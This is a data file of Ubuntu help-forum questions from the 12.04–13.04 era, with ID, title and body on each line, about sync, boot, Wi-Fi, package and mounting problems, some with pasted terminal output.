288297	could not download content from storage	i reinstalled ubuntu on my laptop from scratch to the latest version raring rail 13.04 . but now ubuntu one does not sync all the files in the cloud to my local machine . it says they are all in synch but locally there are missing files that i can see in the ubuntuone 's website files . then i noticed that if i try to download those files manually from ubuntuone 's website i get this error message '' could not download content from storage '' what does this mean ? i hope the file are not lost ! i tried twice to reinstal ubuntuone on my laptop following these instructions but i get same problem after hours of wait , it says all is sync but it is not . https : //answers.launchpad.net/ubuntuone-client/+faq/778 this is output from my terminal $ u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : working $ ps -c ubuntuone-syncd -o uid , gid uid gid 1000 1000 thanks enrike
288309	gmail app in ubuntu 13.04	i 'm confused about what application that installs the gmail icon in the message menu ( see link to picture ) . i 'm developing my own gmail notification app , so i want to get rid of it . can anyone enlighten me ?
288316	how can i get ubuntu os on a macintosh computer ?	please i 'm currently looking for a solution to install linux ubuntu on my imac . is someone could help me ?
288323	no interface , no terminal	i just rebooted my computer and have no interface ( except my desktop background and desktop files ) , which means no unity and no notification bar . also , ctrl+alt+t does n't work . ctrl+alt+f1 , does however . if anyone has a clue , i would be very grateful ! i really want to get into ubuntu , but it feels so fragile and easy to break : (
288324	how to forward serial devices ' input to x ?	we have a barcode scanner used here , which for some reason has to be a serial device . so all its scanning output is sent to /dev/ttyacm0 . if i cat /dev/ttyacm0 , i could get the strings . problem now is , how to let these input be sent to x , acting like a normal keyboard . any ideas ?
288326	lotus 8.5.3 on ubuntu 13.04	everybody ! just ca n't install this app on 13.04 gnome edition due to the absence of libcupsys2 packet . when trying to install it - there is dependency on libkrb53 . instead of it i have libkrb5-3 , but it can not be removed . there is quite enough information about this issue , but i still cant find any workaround . thnx !
288328	rabbitvcs nautilus not working on ubuntu 13.04	i just installed rabbitvcs on ubuntu 13.04 as per the official instructions . when i tried to install apt-get install rabbitvcs-nautilus3 , i got the following error message : reading package lists ... done building dependency tree reading state information ... done package rabbitvcs-nautilus3 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : rabbitvcs-nautilus e : package 'rabbitvcs-nautilus3 ' has no installation candidate so i installed it with apt-get install rabbitvcs-nautilus , and now rabbitvcs options are not showing when i right click on a folder . any help and suggestions will be highly appreciable . thanks .
288329	how to connect a sony psp system to ubuntu ?	i tried to connect my sony psp e1004 on to my ubuntu 12.10 desktop , but no result.nothing happens.what will i do ? i must connect my psp to computer for file and games sharing.tell me what to do !
288330	how do i install ubuntu minimal few require components ?	i 'm new to the world of linux & do n't know all the fancy words . i was using ubuntu 12.04 on my laptop hp envy 4 1046tx and had issues like battery draining out fast , excessive heating , undue cpu usage ... . a friend of mine suggested that i install ubuntu minimal and install all the components that i require . now , i have a little problem understanding how i can do that . first of all , minimal installer only gives me a terminal , right ? so , how do i add up the applications i need ? second , how do i find drivers that are specifically meant for my machine ? if i stuff up all the drivers standard install comes with then i believe the problem battery overuse will persist ! i also observed that there is an md5 given with every iso in minimal iso page . what does that mean ? please take me as a novice and explain in simplest way possible .
288334	how do i setup a fine grained preseed with tasksel set to manual ?	i am trying to preseed a netboot install of ubuntu 13.04 ( raring ringtail ) x64 . work setup my preseed configuration works fine as long as tasksel is not set to manual . for example : [ ... ] d-i base-installer/install-recommends boolean false d-i base-installer/kernel/image select linux-image-3.8.0-19-generic tasksel tasksel/first multiselect minimal d-i pkgsel/include string \ lubuntu-artwork lubuntu-default-settings plymouth-theme-lubuntu-logo plymouth-theme-lubuntu-text \ anacron ca-certificates acpi-support dbus-x11 lxpanel lxsession openbox pcmanfm ttf-dejavu-core \ fonts-freefont-ttf xinit x11-common xserver-xorg xserver-xorg-input-all xserver-xorg-video-vmware \ xserver-xorg-video-radeon gvfs alsa-utils policykit-1-gnome lxappearance-obconf lxrandr lxterminal \ localepurge deborphan synaptic iotop curl p7zip-full d-i preseed/late_command string \ wget http : //11.11.11.62/share/preseed_late.sh -qp /target/tmp/ ; \ chmod 777 /target/tmp/preseed_late.sh ; \ chroot /target/ /tmp/preseed_late.sh [ ... ] this works readily in a virtual machine . the problem however , as soon as i set tasksel to manual , aptitude conflict resolution grinds to a halt with hundreds of < package > : i386 wanting to be installed . for example : [ ... ] d-i base-installer/install-recommends boolean false d-i base-installer/kernel/image select linux-image-3.8.0-19-generic tasksel tasksel/first multiselect manual d-i pkgsel/include string \ ubuntu-standard [ ... ] this simple preseed leads to an aptitude manual configuration screen with 282 broken packages , all of them being i386 variants of the dependencies of ubuntu-standard , while the amd64 variants has been or was being installed . manually deselecting the conflicting i386 packages seems to fix each specific conflicts ( i did not deselect all the packages ) . i do not know how these < package > : i386 crept up . i tried using ubuntu-minimal or ubuntu-standard : amd64 at pkgsel/include with no success , even by setting base-installer/install-recommends to true . i searched for a preseed option to force the architecture in ubuntu documentation and debian documentation ( wiki.debian.org/debianinstaller/preseed ) but to no avail . the goal my intent was to simply further slim down the install footprint and get finer grained control over what packages should be installed . i know that i could use ubuntu core ( wiki.ubuntu.com/core ) , however i would prefer a preseed specific solution . hence , i would geatly appreciate some pointers on how to properly setup a preseed with manual tasksel and how can i fix the i386 package installation issue ( it might just be a bug specific to 13.04 x64 ) .
288335	ubuntu 13.04 with gcc/g++/gfortran 4.8 by default ?	i plan to download and install ubuntu 13.04 and i would like to have two compilers on my system . first question : what is the version of gcc/g++/gfortran shipped with ubuntu 13.04 ? ( is it 4.7.3 ? ) . so , i would like to have gcc/g++/gfortran 4.8 as my default compiler ( and 4.7.3 as a `` backup '' ) . is there a well precompiled version avaible somewhere ( compiled with the right optimizations and enabling std : :thread ) ? and how to download on install it ?
288346	how do i change the calendar language ?	i installed ubuntu 13.04 with the default language english , yet the calendar is displayed in local language ( arabic ) , is there a way to change the calendar language to english ? screen shot :
288347	unable to upgrade firefox in ubuntu	i tried these 3 commands to upgrade my firefox version sudo add-apt-repository ppa : mozillateam/firefox-next sudo apt-get update sudo apt-get install firefox but it does n't seems to be work out . and i also did try by this link which is purely manual step process i do n't find any option as in this link . https : //support.mozilla.org/en-us/kb/update-firefox-latest-version . please let know the way to resolve this issue . thanks in advance
288348	how can i read notifyosd messages after they are displayed ?	i 'd like to read a list of messages displayed by notify-osd from time to time . i 'm using 12.04 still , if it matters . is this possible ? these two questions from 2010 indicate that a log file should exist at ~/.cache/notify-osd.log . i have no such file , and i 'd like to know if this is a bug ( in which case this question should be closed ) or if this log file depends on another setting ( like system settings - > privacy ) ? i do n't care about storing data between reboots . i just want to browse messages from the current session . edit : two good answers now but i 'd like to know if these messages are stored anywhere , ( total guess , /tmp ? ram ? ) for a short period after appearing on the screen . some sort of buffer must exist as they appear one after another , a few seconds each , even if there are 20-30 notifications over the span of a minute or two . i failed to mention in my original question that i 'm not interested in yet another ppa + indicator or excessive drive writes , i just want to know if it is possible to see the messages for a short time after they appear . my use case for this is to go back and find what song was played a few minutes ago on a streaming radio station . i have it on as background music , and occasionally a tune sticks in my head after i hear it . i have no way of going back to see what played 1-2 songs ago .
288350	blackscreen after boot ubuntu 12.10	i have a dual boot ( w7 , ubuntu 12.10 ) laptop . everything was ok since some weeks . now i am unable to boot my ubuntu 99 times of a hundred . the process start with the bios settings and all , then grub screen shows up normally ( with all the correct options ) then , when i choose ubuntu option screen turns black ( with back-light ) and that 's all ... i have tried with ctrl+alt+f1 to try to drop to the root console but nothing happens ... if i try enough times the logging screen shows up and from there everything goes smoothly . this is my first serious issue with ubuntu ( and i 'm using it since 8.04 version ) and i have no idea where to start investigating ... this error has made my computer unusable so please , i need help ... thanks for all in advance . p.s . : since i updated to 12.10 while i am working normally from time to time a window pops up with a `` system program problem detected '' . i have n't found a way to get more details about the problem and after reading some web sites seems something `` normal '' ( or at least common ) but i mention it here just in case .
288352	how to stop pidgin to run at ubuntu start up ?	when i turn on laptop , with ubuntu 12.04 installed , pidgin internet messanger appears in the list of the little letter from the right of the screen , up . i do n't want pidgin start by itself . i want to start it myself and stop it myself . how ?
288356	no wifi , ubuntu 13.04 64 bit , notebook asus x75vd	ca n't make wifi to work on ubuntu 13.04 64 bit , notebook asus x75vd : *-network disabled description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 20:168:09f:32 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.8.0-19-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport000 ( size=256 ) memory : f7900000-f7903fff dan @ asus : ~ $ sudo ifconfig wlan0 up [ sudo ] password for dan : siocsifflags : operation not possible due to rf-kill any help ?
288359	is davmail gone ?	i 've searched a lot but neither in the documentation nor in google i can find something about the missing davmail . i do n't have updated my ubuntu to a newer release and just realized my exchange calendar is not available , my davmail icon is gone , davmail is not installed , davmail is not available in the software center and davmail is also not available on ppa . is davmail just a mirage ? i 'm confused there is no wiki entry on http : //wiki.ubuntuusers.de..
288362	mr transmission , please turn off the pc after all downloads are completed !	# ! /bin/bash echo `` password '' | sudo -s halt i pointed this script to `` call script when torrent is completed '' option under : edit > preferences > downloading problem : this script shut-downs the computer after any finished download while there are more torrents in queue ! how can i improve it ?
288364	ubuntu web server is not accessible outside localhost	i have a web server running the latest version of ubuntu , lamp stack and everything else required to run a local server . i managed to install wordpress on localhost/wordpress . and going to just localhost brings up `` this is a test page ... . '' when i type in the ip of the ubuntu running system on another network , i get the `` this is a test page ... '' properly as it should come , however , when i go to myip/wordpress it says that a php file is missing in /etc/wordpress/somelongthingithaticantremember . what have i done wrong and/or what should i do to fix it ? thanks for your time , yash .
288373	vmplayer problem - vmware kernel module updater does n't run since 13.04 upgrade	when i run vmplayer , it detects that the kernel has changed , and as usual prompts compile and load the required modules . however , it never gets any further . when you choose install , it just quits silently with no error or any further action . what should happen is that the vmware kernel module updater should run . it does n't . please note , this is not the same as the question answered here , what is the path to the kernel headers so i can install vmware ? , which is due to the proper header files not being where they need to be . mine never gets this far , and besides , i made sure i have all the latest header files for my 3.8.0-19-generic kernel .
288378	can not remap alt-tab combination after switching ctrl and alt	on ubuntu 13.04 desktop i am trying to change keyboard layout . first in system settings - > keyboard layout - > options - > alt-win behaviour , i picked the following mapping : ctrl is mapped to alt alt is mapped to win . and that works perfect . now i want to change shortcut for application switching ( since i swapped keys it is win-tab now , i want it back on alt-tab ) in system settings - > keyboard - > shortcuts - > navigation , i picked new combination for switch applications . it is properly detected as ctrl-tab , but it is not working . it still works as alt-tab ( since i swapped keyboard in first step , it is actually win-tab ) . is this a bug ? is there any way i can change combination for switching applications ? thanks .
288379	how to change my desktop background image `` forever '' ?	i have a picture which i want to set as desktop background , and i want it to stay the background image even when i restart my computer ( i do n't want to set it every time manually , from system settings - > apparence - > background ) . please help me , i used ubuntu tweak for the login screen logo , but i ca n't figure out how to change the desktop background `` forever '' . many thanks !
288385	wireless loses connection quite often	english : i 've installed ubuntu alongside windows 7 . works great . there 's just one problem . wireless works under windows 7 . booting into ubuntu i get a list of wireless hot-spots . i also manage to connect to the wireless . but the connection only last for about 1 to 2 min then its disconnected . if i then click to reconnect it often works but sadly just 5-10 seconds . does anyone have an idea ? that would be great .
288387	external drives in ubuntu 13.04 are not easily accessed	how do i access external drives in ubuntu 13.04 ? external drives can not be viewed or obtained ( accessed ) in the file folder ( that is , by clicking on the file icon ) . previous versions of ubuntu included this convenience as a basic feature .
288389	ubuntu 13.04 rhythmbox does n't recognise title and artist	i recently upgraded from ubuntu 12.10 to 13.04 . rhythm box recognized my audio cd artists and titles in 12.10 but 13.04 just shows unknown for both
288390	how to open many-tabbed gnome terminal as one windown instead of many independent windows	aa= $ ( ps -e | grep `` chrome '' | awk ' { print $ 1 ; } ' ) for i in $ aa do gnome-terminal -- tab -e '' sudo cpulimit -p $ i -l 35 `` done i want to open one gnome window before the execution of the iteration , and then use something like -- tab -e `` '' , inside the loop to open all in the main gnome window , and to be all tabbed.in code above , it works but it will open an independent gnome terminal for each iteration of the loop , and i dont want it to be like this i tried this but it gives me error aa= $ ( ps -e | grep `` chrome '' | awk ' { print $ 1 ; } ' ) gnome-terminal for i in $ aa do -- tab -e '' sudo cpulimit -p $ i -l 35 `` done any suggestions ? regards
288396	windows 7 and ubuntu 13.04 dual boot , grub menu not showing	i have windows 7 home premium 64bit installed on my laptop , now i have installed ubuntu desktop 13.04 from bootable flash but ubuntu grub menu not showing . when i start my pc , after normal boot , there is no grub or os selection menu and my system loads straight into windows 7 . i selected `` install ubuntu alongside windows 7 '' then from `` advance partitioning tool '' i selected different drives for ubuntu root and swap . if i run ubuntu installer again it says you already have windows 7 and ubuntu 13.04 on your system . [ edit ] i read it in ubuntu help that in the drop-down under device for boot loader installation : never choose any other partition ! ( this may break the boot of your other systems bug # 1049549 ) see img here so i deleted my / drive and installed ubuntu again with this configuration , its working fine now . thanks to all for answering .
288400	upgrading from 12.10 to 13.04 - > dpkg : error processing sudo ( -- configure )	here 's the deal and reason i 'm asking for your help . last night i went on upgrading my xubuntu 12.10 installation to 13.04 , so at tty1 i run the command sudo do-release-upgrade and everything seemed to went well except that after rebooting and when i run sudo apt-get update & & sudo apt-get upgrade i get this error : sudo apt-get update & & sudo apt-get upgrade hit http : //pt.archive.ubuntu.com raring release.gpg hit http : //pt.archive.ubuntu.com raring-updates release.gpg hit http : //dl.google.com stable release.gpg hit http : //pt.archive.ubuntu.com raring-backports release.gpg hit http : //pt.archive.ubuntu.com raring release hit http : //archive.canonical.com raring release.gpg hit http : //ppa.launchpad.net raring release.gpg hit http : //pt.archive.ubuntu.com raring-updates release hit http : //extras.ubuntu.com raring release.gpg hit http : //pt.archive.ubuntu.com raring-backports release hit http : //dl.google.com stable release hit http : //pt.archive.ubuntu.com raring/main sources hit http : //pt.archive.ubuntu.com raring/restricted sources hit http : //extras.ubuntu.com raring release hit http : //archive.canonical.com raring release hit http : //ppa.launchpad.net raring release.gpg hit http : //pt.archive.ubuntu.com raring/universe sources hit http : //pt.archive.ubuntu.com raring/multiverse sources hit http : //dl.google.com stable/main i386 packages get:1 http : //security.ubuntu.com raring-security release.gpg [ 933 b ] hit http : //pt.archive.ubuntu.com raring/main i386 packages hit http : //extras.ubuntu.com raring/main sources hit http : //ppa.launchpad.net raring release hit http : //archive.canonical.com raring/partner i386 packages hit http : //pt.archive.ubuntu.com raring/restricted i386 packages hit http : //pt.archive.ubuntu.com raring/universe i386 packages hit http : //extras.ubuntu.com raring/main i386 packages hit http : //pt.archive.ubuntu.com raring/multiverse i386 packages hit http : //ppa.launchpad.net raring release hit http : //pt.archive.ubuntu.com raring/main translation-en hit http : //ppa.launchpad.net raring/main sources hit http : //ppa.launchpad.net raring/main i386 packages hit http : //pt.archive.ubuntu.com raring/multiverse translation-en hit http : //pt.archive.ubuntu.com raring/restricted translation-en hit http : //pt.archive.ubuntu.com raring/universe translation-en hit http : //pt.archive.ubuntu.com raring-updates/main sources hit http : //pt.archive.ubuntu.com raring-updates/restricted sources hit http : //ppa.launchpad.net raring/main sources hit http : //pt.archive.ubuntu.com raring-updates/universe sources hit http : //pt.archive.ubuntu.com raring-updates/multiverse sources hit http : //pt.archive.ubuntu.com raring-updates/main i386 packages hit http : //ppa.launchpad.net raring/main i386 packages hit http : //pt.archive.ubuntu.com raring-updates/restricted i386 packages hit http : //pt.archive.ubuntu.com raring-updates/universe i386 packages hit http : //pt.archive.ubuntu.com raring-updates/multiverse i386 packages ign http : //dl.google.com stable/main translation-en_us hit http : //pt.archive.ubuntu.com raring-updates/main translation-en ign http : //archive.canonical.com raring/partner translation-en_us ign http : //extras.ubuntu.com raring/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //archive.canonical.com raring/partner translation-en hit http : //pt.archive.ubuntu.com raring-updates/multiverse translation-en ign http : //extras.ubuntu.com raring/main translation-en hit http : //pt.archive.ubuntu.com raring-updates/restricted translation-en hit http : //pt.archive.ubuntu.com raring-updates/universe translation-en hit http : //pt.archive.ubuntu.com raring-backports/main sources hit http : //pt.archive.ubuntu.com raring-backports/restricted sources hit http : //pt.archive.ubuntu.com raring-backports/universe sources hit http : //pt.archive.ubuntu.com raring-backports/multiverse sources hit http : //pt.archive.ubuntu.com raring-backports/main i386 packages hit http : //pt.archive.ubuntu.com raring-backports/restricted i386 packages hit http : //pt.archive.ubuntu.com raring-backports/universe i386 packages hit http : //pt.archive.ubuntu.com raring-backports/multiverse i386 packages hit http : //pt.archive.ubuntu.com raring-backports/main translation-en hit http : //pt.archive.ubuntu.com raring-backports/multiverse translation-en get:2 http : //security.ubuntu.com raring-security release [ 40.8 kb ] hit http : //pt.archive.ubuntu.com raring-backports/restricted translation-en hit http : //pt.archive.ubuntu.com raring-backports/universe translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en get:3 http : //security.ubuntu.com raring-security/main sources [ 2,109 b ] ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en get:4 http : //security.ubuntu.com raring-security/restricted sources [ 14 b ] get:5 http : //security.ubuntu.com raring-security/universe sources [ 14 b ] get:6 http : //security.ubuntu.com raring-security/multiverse sources [ 14 b ] get:7 http : //security.ubuntu.com raring-security/main i386 packages [ 3,670 b ] get:8 http : //security.ubuntu.com raring-security/restricted i386 packages [ 14 b ] get:9 http : //security.ubuntu.com raring-security/universe i386 packages [ 2,824 b ] get:10 http : //security.ubuntu.com raring-security/multiverse i386 packages [ 14 b ] ign http : //pt.archive.ubuntu.com raring/main translation-en_us ign http : //pt.archive.ubuntu.com raring/multiverse translation-en_us ign http : //pt.archive.ubuntu.com raring/restricted translation-en_us ign http : //pt.archive.ubuntu.com raring/universe translation-en_us ign http : //pt.archive.ubuntu.com raring-updates/main translation-en_us ign http : //pt.archive.ubuntu.com raring-updates/multiverse translation-en_us hit http : //security.ubuntu.com raring-security/main translation-en ign http : //pt.archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //pt.archive.ubuntu.com raring-updates/universe translation-en_us ign http : //pt.archive.ubuntu.com raring-backports/main translation-en_us ign http : //pt.archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //pt.archive.ubuntu.com raring-backports/restricted translation-en_us hit http : //security.ubuntu.com raring-security/multiverse translation-en ign http : //pt.archive.ubuntu.com raring-backports/universe translation-en_us hit http : //security.ubuntu.com raring-security/restricted translation-en hit http : //security.ubuntu.com raring-security/universe translation-en ign http : //security.ubuntu.com raring-security/main translation-en_us ign http : //security.ubuntu.com raring-security/multiverse translation-en_us ign http : //security.ubuntu.com raring-security/restricted translation-en_us ign http : //security.ubuntu.com raring-security/universe translation-en_us fetched 50.4 kb in 6s ( 7,454 b/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/373 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing sudo ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on sudo ; however : package sudo is not configured yet . dpkg : error processing ubuntu-minimal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : sudo ubuntu-minimal e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried everything i thought logical , like sudo dpkg -- configure -a dpkg : error processing sudo ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on sudo ; however : package sudo is not configured yet . dpkg : error processing ubuntu-minimal ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : sudo ubuntu-minimal sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/373 kb of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing sudo ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on sudo ; however : package sudo is not configured yet . dpkg : error processing ubuntu-minimal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : sudo ubuntu-minimal e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can someone help me , please . edit : here 's some more info that could be of help for anyone . the output of apt-cache policy linux-image-generic-pae linux-generic-pae is linux-image-generic-pae : installed : ( none ) candidate : 3.8.0.19.35 version table : 3.8.0.19.35 0 500 http : //pt.archive.ubuntu.com/ubuntu/ raring/main i386 packages linux-generic-pae : installed : ( none ) candidate : 3.8.0.19.35 version table : 3.8.0.19.35 0 500 http : //pt.archive.ubuntu.com/ubuntu/ raring/main i386 packages
288404	ubuntu stores variables in the wrong order	so i had this exercise in my class where i had to tell which of the two addresses is bigger when i create two char 's in a main function . because local variables are stored in the stack that starts with high address and goes down to low address . the answer was easy that the first char has a bigger address . but then i wrote a little test program : # include `` stdio.h '' int main ( void ) { int a = 3 ; int b = 4 ; printf ( `` size a : % lu \n '' `` size b : % lu \n '' , sizeof ( a ) , sizeof ( b ) ) ; printf ( `` address a : % p \n '' `` address b : % p \n '' , ( void * ) & a , ( void * ) & b ) ; return 0 ; } output : size a : 4 size b : 4 address a : 0x7fffa1eb8a98 address b : 0x7fffa1eb8a9c the output was misleading , the second char address was bigger . i tried the same on a computer at my university and there was everything okay . do you know why this is so ? i 'm on ubuntu 13.04 64bit .
288406	ubuntu 13.04 does n't boot after installation	after installing ubuntu 13.04 ( used 2 disks , 1 250gb for root and another with 2 partitions of which 1 with 10gb for swap ) ubuntu does n't boot , showing a black screen with a blinking cursor two lines down ( i actually saw the cursor going down two lines as if return was pressed ) . the disks do n't seem to be read although they are operational . i 've installed twice this way already ( a third try without any changes seem dumb to me ) . these two installations occurred without internet access ( i tried before with internet access but the system halted fetching file 28 , whatever that means ) . any suggestions ? thanks : ) săšrgio rito
288408	desktop display shows as laptop and resolution mismatch with monitor	i have been using ubuntu 12.04 without problem . after upgrading to 12.10 then 13.04 , the display is messed up : under the setting , displays setting shows as laptop , detection display button does not work , i can not change the resolution either . i am using a monitor with 1600x900 but the resolution in displays is set as 1280x1080 . i have tried to reinstall the ubuntu from cd , the problem is the same . i tried to install ubuntu 13.04 on a new partition , then , the displays work ok . anyone have idea how to fix this ? thanks a lot . here is the output from the command below : lspci -nnk | grep -ia3 vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs780l [ radeon 3000 ] [ 1002:9616 ] subsystem : asustek computer inc. device [ 1043:8388 ] 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : asustek computer inc. p8p67 and other motherboards [ 1043:8432 ] the output from xrandr is : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 400 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1152x864 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 720x400 0.0
288410	ubuntu 13.04 : user name	nautilus ( the file manager ) shows home > dropbox but dropbox shows home > user > dropbox what is going one ? is it a display issue or has the file tree been altered ? i have n't used terminal commands in so long i have forgotten how to figure it out at that level - but after upgrading to 13.04 yesterday dropbox stopped updating , almost certainly because dropbox thinks these files are at home > user > dropbox but the system seems to have eliminated the user level . show hidden files does n't help . i ca n't use ubuntu without dropbox , and it has worked for 5 years , now i am flummoxed .
288414	i deleted windows and i am having trouble merging the unused partition	i tried ubuntu . i like it , i cleared the partition that had windows on it , now i ca n't seem to merge my /dev/sda5 ext4 partition with my unallocated partition . ubuntu is installed on a 42 gig partition , but i have an unallocated partition of 320 gigs and i would like to merge the two .
288418	ubuntu menu and applications bar gone , and some programs too	i was following this guide ( https : //help.ubuntu.com/community/opencv ) in order to install opencv . sudo su sudo apt-get install build-essential sudo apt-get install libavformat-dev sudo apt-get install ffmpeg sudo apt-get install libcv2.3 libcvaux2.3 libhighgui2.3 python-opencv opencv-doc libcv-dev libcvaux-dev libhighgui-dev i also runned the incomplete command : sudo apt-get install libcv2.3 libcvaux2.3 libhighgui2.3 python- the first time , by mistake , but i guess that should n't do anything wrong.. i also runned a sudo apt-get autoremove at some point . after this , the ubuntu interface got all strange , resembling what this post describes.. : launcher and window menu bar missing after 12.04 upgrade however , that 's not the only issue ... some programs i had installed do n't get their commands auto completed in the terminal anymore and i can not find their bins at all ... i do n't understand ... it looks like something removed a lot of random programs ... . like firefox , terminator ... and maybe unity ? could it be that apt-get triggered some kind of update process that was interrupted ? i do n't have idea of what is going on here.. i already tried sudo apt-get -f install but it did n't solve anything . installing unity restored some interface elements but almost all my launcher icons are gonne and the interface skin is horrible and glitchy ... . any suggestions ? i would like to be able to recover my programs back : ( thanks .
288428	install solr-4.2.1-src.tgz	i have installed jdk 1.7 in order to run solr . i downloaded solr and tried the following command tar xzf solr-4.2.1-src.tgz there was no change here though . but what is the next step to install ? i tried extracting it but i am unsure on the steps . after this in one of the documentation it is said to run start.jar which i again fail ! ! tried with the following one java -jar start.jar error is - unable to access jarfile start.jar by the way i was following this documentation , click any help , appreciated ! ! !
288430	how to enable thumbnail view on file dialog boxes ?	i find it very inconvenient when i need to upload a file from a folder with a lot of pictures and i need to inspect each file to find the image i 'm looking for . how do i make file dialog boxes view thumbnails like the way your file manager does ? basically , from this : to this : i hear it 's impossible . is it true ?
288433	ubuntu server boot without keyboard/monitor	hope someone can help me with this unusual problem . i installed ubuntu 12.04 server on a gigabyte ga-h61m-usb3 motherboard . this all went well . i subsequently installed apache , mysql and php . this also went well . i am using the ufw kernal firewall instead of the recommended shorewall ( could not find the repository during installation ) . i thought i had a working server until i relocated the box and attempted to log in using putty . turns out that the server does not boot without a monitor and keyboard connected . i do n't believe there is anything in the motherboard that is preventing the boot . has anyone else seen this behavior and what was your fix . thanks .
288434	do i have a broken ubuntu 13.04 installation ?	i have installed ubuntu 13.04 in my home ( 32 bits ) and in my office desktop ( 64 bits ) . the one at my home was upgraded to 13.04 from 12.10 ( the actual install was 11.04 and all the version were upgraded ) while on office machine i have installed from downloaded fresh iso of 13.04 . at my home i see ubuntu offering me regular updates sometimes even twice a day whereas the office machine has never offered any update so far . since i have been using ubuntu for few years now i can sense that there is something broken in ubuntu 13.04 installation at office i.e . empathy does n't showup in message menu , ubuntu one icon is not there in taskbar etc . no matter how many times i start software updater it never shows me any update ? how can i fix that ? see screenshot
288435	zram enabled but swap in ram not used	so i 've just decided to enable zram on my 6 gb ram ubuntu 12.04 , using zram-config . it takes about 2.9 gb of ram ( after manually starting up the service , fixing this later ... ) , but , even with different values of swappiness , it says that there 's about 3 gb of swap , but never use it . and i 've already rebooted . any idea ?
288437	how fix hostapd invalid/unknown driver 'nl80211 ' error ?	i have intel centrino wireless-n 1000 i installed hostapd from ubuntu software center when i run this command hostapd hostapd-minimal.conf i got this : root @ tarek-pc : ~ # hostapd hostapd-minimal.conf configuration file : hostapd-minimal.conf line 2 : invalid/unknown driver 'nl80211 ' line 4 : unknown hw_mode 'g ' 2 errors found in configuration file 'hostapd-minimal.conf' please help me ... after doing make : first i had this error : driver_nl80211.c:25:26 : warning : netlink/attr.h : no such file or directory i solved it by installing `` libnl-1.0pre8 '' now i have this error when doing make command : ../src/crypto/crypto_openssl.c:10:30 : fatal error : openssl/opensslv.h : no such file or directory compilation terminated . make : *** [ ../src/crypto/crypto_openssl.o ] error 1 can anyone help me with that error i am running ubuntu 13.04 ?
288441	does installed from source software get overwritten by automatic updates ?	as an example i 've installed libcurl v7.30 from source , using their tutorial : ./configure -- disable-ipv6 -- enable-ares make make install i 've had libcurl installed from the official repository prior to this . would the install be overwritten by automatic updates ? if yes what is the proper way to install from source and not mess with official installations . if the package is already installed should it be removed before a new install ? i guess an alternative would be to install in a diferent folder , but how wouldn this change usage ? ( in my case compiling ) and would it cause problems with references ?
288443	grub rescue > message on boot time	i have deleted all my partitions at the first for installing windows 7 and ubuntu in dual boot mode and because of lowest knowledge at the time of installing ubuntu i took the size of /home partition = 2000 mb . after installing wine i really wanted to upgrade the size of /home partition . cause of that i deleted the all partitions that i have made first at time of installing ubuntu . and after deleting the partitions , and restarting my laptop ( inspiron n5110 ci5 ) , there is a black window with this message : error : no such partition grub rescue > what should i have to do . please help me because i have a quick exam next day and i do n't have any pc to read my subjects . thanks a lot .
288444	how i can set program autostart to my second desktop ?	in lubuntu we have folder /home/username/.config/autostart . its ok , but how i can autostart app on my `` invisible '' desktop and in fullscreen ( like after pressing f11 ) ?
288446	how can i fix `` nt_status_logon_failure '' error when mounting using cifs ?	i 've recently upgraded my station to 13.04 and all mounts i had on /etc/fstab stopped working . i ca n't even mount them at terminal ( using mount -t cifs ) through smbclient or nautilus . i always get nt_status_logon_failure . provided nothing has changed at the server , i assume some configuration has changed in the packages of 13.04 . maybe password encryption , maybe port ? i have just spent 10 hours looking for a solution and , since i have a serious time retrain , i am considering rolling back to 12.10 . could someone give a clue where to find it ? thanks all .
